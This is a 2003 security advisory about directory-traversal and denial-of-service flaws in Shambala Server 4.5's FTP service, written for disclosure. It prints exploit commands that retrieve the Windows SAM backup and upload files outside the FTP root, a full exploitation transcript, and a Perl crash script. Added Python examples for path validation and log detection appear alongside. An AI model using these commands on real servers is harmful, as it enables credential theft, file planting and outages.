Category:   Application (File Transfer/Sharing)  >   Shambala Server
Vendors:   Evolvable Corporation
Shambala Server FTP Input Validation Bugs Let Remote Authenticated Users View and Upload Files and Crash the Server
SecurityTracker Alert ID:  1005943
SecurityTracker URL:  http://securitytracker.com/id/1005943
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 18 2003
Impact:   Denial of service via network, Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information
Exploit Included:  Yes  
Version(s): 4.5
Description:   Several flaws were reported in the FTP server component of Shambala Server. A remote authenticated user can view and upload arbitrary files. A remote authenticated user can also cause the server to crash.

It is reported that the FTP server component does not filter "\.." and "/.." character sequences from certain user-supplied command requests. A remote authenticated user, including an anonymous FTP user, can view files on the system located outside of the FTP document directory. A demonstration exploit command is provided:

get \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\sam._

A remote authenticated user can also upload an arbitrary file to a location outside of the FTP document directory. A demonstration exploit command is provided:

send pwd.pl \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\test.pl

A more detailed demonstration exploit transcript is provided in the Source Message.

A remote user can also cause the FTP service to crash by sending the following command:

CWD /

Impact:   A remote authenticated user, including an anonymous FTP user, can view arbitrary files on the system. A remote authenticated user may be able to upload arbitrary files to arbitrary locations on the server. A remote authenticated user can cause the server to crash.
Solution:   No solution was available at the time of this entry. According to the report, the vendor does not regard these as flaws.
Vendor URL:  www.evolvable.com/
Cause:   Exception handling error, Input validation error
Underlying OS:  Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   None.


Source Message Contents

Subject:  [VulnWatch] Multiple vulnerabilities found in Shambala Server version 4.5




Multiple vulnerabilities found in Shambala Server version 4.5 (FTP Service)

Discovered by Dennis Rand
www.Infowarfare.dk
------------------------------------------------------------------------


SUMMARY

Shambala is an easy to use communications server featuring the ability to serve and access web sites, ftp sites, and chat rooms. Using Shambala, you can quickly create a web site and host it from any PC. Shambala doesn't require NT and its installation is non-invasive.

Shambala features a WYSIWYG DHTML editor for placing text and props on your web pages. The editor includes a navigation feature that allows you to express your web site as a geographical area and allow your users to move easily between areas. This feature also exists in the editor so you can create a space quickly without worrying about maintaining hyperlinks between areas. Shambala is drag and drop based, allowing you to perfectly size and position your web page elements.

You can use a page you are editing as an interactive whiteboard and chat space. When you move a prop or edit text, people connected to your workspace will receive the change that you make. Their workspace is automatically updated to be a mirror image of yours. If any machine in the group decides to leave, nothing is lost since each subscriber receives a full copy of the web page document being used as a workspace. This powerful feature can be used for interactive classrooms, games, demonstrations, even internet based group workshops.

To transfer files, Shambala has an integrated ftp client and ftp server. The ftp server provides high performance access to shared files. You can also manage the security of the ftp site. The client can browse, download, and upload files to any ftp server. It can even automatically download everything on a remote ftp site.

Shambala pushes the envelope of what you can do with web technology. It supports the existing infrastructure of the web but also provides powerful features that allow you to shape the future and evolution of cyberspace.

A directory traversal vulnerability in the product allows remote attackers to make the server traverse into directories that reside outside the bounding FTP root directory. The server is also vulnerable to a DoS attack.

DETAILS

Vulnerable systems:
 * Shambala Server version 4.5 on Windows NT 4.0 and Windows 2000 Server, fully patched

Immune systems:
 * None. Shambala will not fix any errors they do not consider to be problems.

Shambala Server fails to filter out "\.." and "/.." sequences in specific command requests, allowing a remote user to break out of the restricted directories and gain read access to the system directory structure. It is possible to discover the directory structure outside the configured areas and to get files from outside the configured areas; the part that could be even worse is that files can be sent to places outside the configured areas, so a trojan could be placed.
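The server-side check the advisory says is missing, written here as an added example (not Shambala's code, which is not public, and not the advisory author's): it treats "\" and "/" alike, refuses any hop above the FTP root, and is exercised with the exact arguments from the transcript. FTP_ROOT is a hypothetical root directory.

```python
import ntpath  # Windows path rules, whatever host this runs on

FTP_ROOT = r"C:\Shambala Server 4.5\ftproot"  # hypothetical root, not from the advisory


def resolve_within_root(root, cwd, arg):
    """Map the FTP argument arg onto a Windows path under root, or return None.

    cwd is the session's virtual directory ("/" is the FTP root). "/" and "\\"
    are treated alike: Windows accepts both, and the advisory shows "\\..\\"
    sequences getting past the server's filtering while "cd .." is refused.
    """
    unified = arg.replace("\\", "/")
    # No drive letters (C:), alternate data streams (file:stream) or UNC paths.
    if ":" in unified or unified.startswith("//"):
        return None
    # An absolute FTP path is relative to the FTP root, not the volume root.
    base = unified if unified.startswith("/") else cwd.rstrip("/") + "/" + unified
    parts = []
    for comp in base.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:  # a hop above the FTP root is an escape attempt
                return None
            parts.pop()
        else:
            parts.append(comp)
    candidate = ntpath.normpath(ntpath.join(root, *parts))
    # Belt and braces: the normalised, case-folded result must still sit under root.
    nroot = ntpath.normcase(ntpath.normpath(root))
    ncand = ntpath.normcase(candidate)
    if ncand != nroot and not ncand.startswith(nroot + "\\"):
        return None
    return candidate


def audit_advisory_paths(root=FTP_ROOT):
    """Run the arguments from the advisory transcript through the check (cwd "/")."""
    hops = "\\.." * 10 + "\\"  # \..\..\..\..\..\..\..\..\..\..\ as typed in the transcript
    samples = {
        "cd ..": "..",
        "cd /": "/",
        "cd \\..\\": "\\..\\",
        "ls <hops>": hops,
        "get <hops>WINNT\\REPAIR\\sam._": hops + "WINNT\\REPAIR\\sam._",
        "send pwd.pl <hops>WINNT\\REPAIR\\test.pl": hops + "WINNT\\REPAIR\\test.pl",
        "get pwd.pl": "pwd.pl",
    }
    return {cmd: resolve_within_root(root, "/", arg) for cmd, arg in samples.items()}
```

Only "cd /" (the FTP root itself) and "get pwd.pl" resolve; every traversal argument returns None. The crash on "CWD /" is a separate exception-handling defect that this check does not address.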


The following transcript demonstrates a sample exploitation of the vulnerabilities:


C:\>ftp
ftp> open
To 192.168.1.199
Connected to 192.168.1.199.
220 winnt40 - Shambala FTP Server Ready.
User (192.168.1.199:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> ls
200 PORT command successful.
150 Opening data connection.
192.168.1.199
index-_-1_0_0.htm
index-_0_0_0.htm
index-_0_1_0.htm
pwd.pl
226 Transfer complete.
ftp: 78 bytes received in 0,00Seconds 78000,00Kbytes/sec.
ftp> cd ..
550 Requested action not taken. Permission denied.
ftp> cd /
257 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening data connection.
192.168.1.199
index-_-1_0_0.htm
index-_0_0_0.htm
index-_0_1_0.htm
pwd.pl
226 Transfer complete.
ftp: 78 bytes received in 0,00Seconds 78000,00Kbytes/sec.
ftp> cd \..\
550 Requested action not taken. Permission denied.
ftp> ls
200 PORT command successful.
150 Opening data connection.
192.168.1.199
index-_-1_0_0.htm
index-_0_0_0.htm
index-_0_1_0.htm
pwd.pl
226 Transfer complete.
ftp: 78 bytes received in 0,01Seconds 7,80Kbytes/sec.
ftp> ls \..\..\..\..\..\..\..\..\..\..\
200 PORT command successful.
150 Opening data connection.
AUTOEXEC.BAT
CONFIG.SYS
I386
Inetpub
Installationsfiler til Windows Update
Multimedia Files
OptionPack
pagefile.sys
Program Files
pwd.pl
Shambala Server 4.5
TEMP
WINNT
226 Transfer complete.
ftp: 181 bytes received in 0,03Seconds 6,03Kbytes/sec.
ftp> ls \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\
200 PORT command successful.
150 Opening data connection.
autoexec.nt
config.nt
default._
ntuser.da_
sam._
security._
setup.log
software._
system._
226 Transfer complete.
ftp: 99 bytes received in 0,06Seconds 1,65Kbytes/sec.
ftp> get \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\sam._
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
ftp: 3196 bytes received in 0,00Seconds 3196000,00Kbytes/sec.
ftp> send pwd.pl \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\test.pl
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
ftp: 3849 bytes sent in 0,00Seconds 3849000,00Kbytes/sec.
ftp> bye
221 Goodbye.
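The same pattern seen from the log side, as an added example (not code from the advisory or the vendor): the log lines are constructed to mirror the transcript above, the line format is hypothetical, and the point is that counting ".." components after unifying both separators catches the backslash form that a "/../" string match misses.

```python
import re

# Constructed FTP command log, not from the advisory; the arguments are the
# ones the transcript sends. Hypothetical format:
#   <time> <client> <user> <COMMAND> <argument> <reply-code>
HOPS = "\\.." * 10 + "\\"
SAMPLE_LOG = [
    "10:02:01 192.168.1.50 anonymous LIST - 226",
    "10:02:05 192.168.1.50 anonymous CWD .. 550",
    "10:02:09 192.168.1.50 anonymous CWD / 257",
    "10:02:14 192.168.1.50 anonymous CWD \\..\\ 550",
    "10:02:20 192.168.1.50 anonymous LIST " + HOPS + " 226",
    "10:02:31 192.168.1.50 anonymous RETR " + HOPS + "WINNT\\REPAIR\\sam._ 226",
    "10:02:40 192.168.1.50 anonymous STOR " + HOPS + "WINNT\\REPAIR\\test.pl 226",
    "10:03:02 192.168.1.77 alice RETR reports/q4.htm 226",
]

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")


def traversal_depth(arg):
    """Count '..' path components, treating '/' and '\\' alike so the
    backslash form the advisory relies on is not missed."""
    return sum(1 for c in arg.replace("\\", "/").split("/") if c == "..")


def scan_ftp_log(lines):
    """Return one finding per command whose argument hops upward.

    Each finding is (time, client, user, command, depth, honoured); honoured is
    True when the server answered 2xx, i.e. it accepted the traversal. A denied
    attempt (550) is still worth an alert; an honoured one is an incident.
    """
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        time, client, user, cmd, arg, code = m.groups()
        depth = traversal_depth(arg)
        if depth:
            findings.append((time, client, user, cmd, depth, code.startswith("2")))
    return findings
```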

The second attack type is a DoS attack that will kill the server application.
-------------------------------------   Cut Here ------------------------------
------------
#!/usr/bin/perl
#
# Shambala Server version 4.5
# http://www.evolvable.com
# Dennis Rand - matrix@infowarfare.dk
#
# What happens when this exploit is sent: the server crashes
# with an error message on the server.
#
#          __________________________
#         | Run-time error '20127':  |
#         |Invalid ConnectionID      |
#         ----------------------------
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
use strict;
use warnings;
use Net::FTP;

my $target = shift() || die "usage: $0 target-ip\n";
my $user = "anonymous";
my $pass = "mail\@mail.com";

system('cls');    # clears the console on Windows
print "Shambala Server version 4.5 DoS attack\n";
print "Trying to connect and destroy target system at: $target...\n";
# Net::FTP->new returns undef on failure and leaves the reason in $@
my $ftp = Net::FTP->new($target, Debug => 1, Port => 21)
    or die "could not connect: $@";
$ftp->login($user, $pass) or die "could not login: " . $ftp->message;
# A single CWD to "/" is enough to trigger the run-time error shown above
$ftp->cwd("/");
$ftp->quit;
-------------------------------------   Cut Here ------------------------------
------------

Detection:
Shambala Server version 4.5 is vulnerable to the above-described attacks. Earlier versions may be susceptible as well. To determine if a specific implementation is vulnerable, experiment by following the above transcript.

Vendor response:
Shambala Server version 4.xx fixes this issue. The latest version is available from http://www.evolvable.com


Disclosure timeline:
18/11/2002 Found the vulnerability.
19/11/2002 Author notified. Sent mail to webmaster@evolvable.com and help@evolvable.com
18/01/2003 Responses received from Evolvable.
18/01/2003 Public disclosure.


ADDITIONAL INFORMATION
The vulnerability was discovered by Dennis Rand (matrix@infowarfare.dk)

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



